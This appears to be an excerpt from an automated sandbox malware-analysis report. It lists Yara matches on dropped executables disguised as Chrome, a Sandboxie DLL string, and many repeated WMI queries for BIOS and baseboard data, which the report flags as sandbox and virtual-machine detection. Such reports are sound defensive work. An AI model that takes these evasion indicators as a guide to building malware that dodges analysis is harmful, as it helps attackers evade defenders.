Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: chrome.exe, chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: SBIEDLL.DLL
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
